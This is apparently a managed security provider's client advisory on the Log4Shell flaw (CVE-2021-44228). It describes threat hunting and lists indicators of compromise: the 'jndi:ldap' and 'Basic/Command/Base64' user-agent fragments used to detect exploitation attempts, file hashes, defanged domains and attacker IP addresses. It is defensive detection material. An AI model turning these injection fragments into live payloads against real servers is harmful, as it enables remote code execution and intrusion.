UPDATE: Log4Shell –CVE-2021-44228 –Apache Log4j Vulnerability

Priority: Critical

Executive Summary:

ITC Secure is continuing to monitor for any alerts that could indicate an incident related to the recent Log4J vulnerability. ITC have carried out threat hunting across the available log sources we ingest into Sentinel for signs of initial compromise and reviewed endpoint activity for suspicious process executions which would be seen following any initial compromise. ITC will continue to carry out these threat hunting activities and will escalate any findings.

We are conscious that we may not have coverage of all log sources within your estate and at the time of preparing this report, have provided further details and information on IOCs that your internal Network and Security Teams can use to assist further investigation.

Specific guidance that has been published by Microsoft can be found here.

Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation -Microsoft Security Blog

Further Guidance at the time of preparing this report:

IOCs:

While user agent strings are available from different log sources, to detect CVE-2021-44228, IIS server logs should be reviewed for evidence of the below user agents:
“jndi:ldap”
“Basic/Command/Base64”

If the above user agent strings are found within the IIS logs it is not indicative that a compromise has occurred, but it does indicate that someone has attempted to exploit the server. If the server was vulnerable to CVE-2021-44228 it may have succeeded. Please reach out to the ITC SOC should you find any reference to these user agent strings with the targeted server so that we can provide further investigation.

Hashes:

These hashes have been identified as being involved in the recent Log4j attacks. If you have the means to search for hashes through anti-virus or similar, consider searching for evidence of these hashes within your environment. If found, contact ITC SOC for further investigation. If you can block the hashes, consider doing so but understand that attackers will be regularly changing their payloads to avoid detection through these IOCs.

8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef

6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b

c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984

0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049

19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d

2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984

39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129

5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28

6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b

63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9

6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05

715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7

776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00

8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce

b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778

b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0

c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40

c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799

e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80

fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

Domains:

ITC has carried out and will continue to carry out threat hunting using the below domains which have been identified as being involved with CVE-2021-44228. Due to the nature of this attack, domains that host malicious payloads will change frequently to avoid detection or due to takedowns.

x41[.]me

m3[.]wtf

cuminside[.]club

abrahackbugs[.]xyz

pwn[.]af

rce[.]ee

psc4fuel[.]com

rs3c1[.]com

leakix[.]net

IPs:

ITC has carried out and will continue to threat hunt using the below IP addresses against firewall logs where available.

109.237.96[.]124

185.100.87[.]202

213.164.204[.]146

185.220.101[.]146

171.25.193[.]20

178.17.171[.]102

45.155.205[.]233

171.25.193[.]25

171.25.193[.]77

171.25.193[.]78

185.220.100[.]242

IPs Continued:

185.220.101[.]39

18.27.197[.]252

89.234.182[.]139

104.244.79[.]6

164.52.212[.]196

193.196.53[.]232

121.5.113[.]11

178.176.202[.]121

178.176.203[.]190

197.246.171[.]83

42.192.11[.]41

45.130.229[.]168

18.228.7[.]109

45.33.47[.]240

80.78.254[.]57

176.32.33[.]14

137.184.61[.]190

45.33.47[.]240

80.78.254[.]57

205.185.115[.]217

176.32.33[.]14

104.244.74[.]57

104.244.76[.]170

107.189.12[.]135

116.24.67[.]213

134.122.34[.]28

137.184.102[.]82

122.161.50[.]23

137.184.106[.]119

142.93.34[.]250

143.198.32[.]72

143.198.45[.]117

147.182.167[.]165

147.182.169[.]254

147.182.219[.]9

151.115.60[.]113

159.65.155[.]208

159.65.58[.]66

164.90.199[.]216

167.99.164[.]201

167.99.172[.]213

167.99.172[.]58

178.62.79[.]49

181.214.39[.]2

185.220.101[.]134

185.220.101[.]138

185.220.101[.]141

185.220.101[.]143

185.220.101[.]144

185.220.101[.]145

185.220.101[.]147

185.220.101[.]149

185.220.101[.]154

IPs Continued:

185.220.101[.]156

185.220.101[.]157

185.220.101[.]158

185.220.101[.]160

185.220.101[.]161

185.220.101[.]163

185.220.101[.]171

185.220.101[.]172

185.220.101[.]175

185.220.101[.]177

185.220.101[.]180

185.220.101[.]181

185.220.101[.]182

185.220.101[.]185

185.220.101[.]186

185.220.101[.]189

185.220.101[.]191

193.189.100[.]203

194.48.199[.]78

195.19.192[.]26

195.254.135[.]76

195.54.160[.]149

23.129.64[.]131

185.38.175[.]132

188.166.122[.]43

188.166.48[.]55

188.166.92[.]228

23.129.64[.]146

23.129.64[.]148

45.153.160[.]131

46.182.21[.]248

54.173.99[.]121

62.102.148[.]69

62.76.41[.]46

68.183.198[.]247

68.183.44[.]143

72.223.168[.]73

81.17.18[.]60

92.63.197[.]53

164.52.53[.]163

164.52.53[.]163

185.220.100[.]240

198.98.60[.]19

86.109.208[.]194

41.203.140[.]114

49.7.224[.]217

195.251.41[.]139

189.188.33[.]125